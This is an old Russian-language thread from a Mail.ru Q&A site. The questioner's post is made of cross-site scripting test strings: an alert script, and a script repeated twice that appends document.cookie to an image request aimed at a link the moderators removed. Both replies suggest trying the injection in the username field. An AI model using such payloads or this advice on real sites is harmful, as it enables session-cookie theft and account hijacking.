Mail.ruПочтаМой МирОдноклассникиИгрыЗнакомстваНовостиПоискСмотриComboВсе проекты

Пользователь удален Ученик (68), закрыт 13 лет назад
<script>alert(/XSS/)
Дополнен 13 лет назад
<script>img = new Image(); img.src = "[ссылка появится после проверки модератором]?"+document.cookie;
Дополнен 13 лет назад
<script>img = new Image(); img.src = "[ссылка появится после проверки модератором]?"+document.cookie;
Дополнен 13 лет назад
iopoipiopiop
Лучший ответ
Hagbard Celine Профи (587) 13 лет назад
ну получилось в имени пользователя?
Остальные ответы
Киприан Лейн Мыслитель (5362) 13 лет назад
попробуй в имени пользователя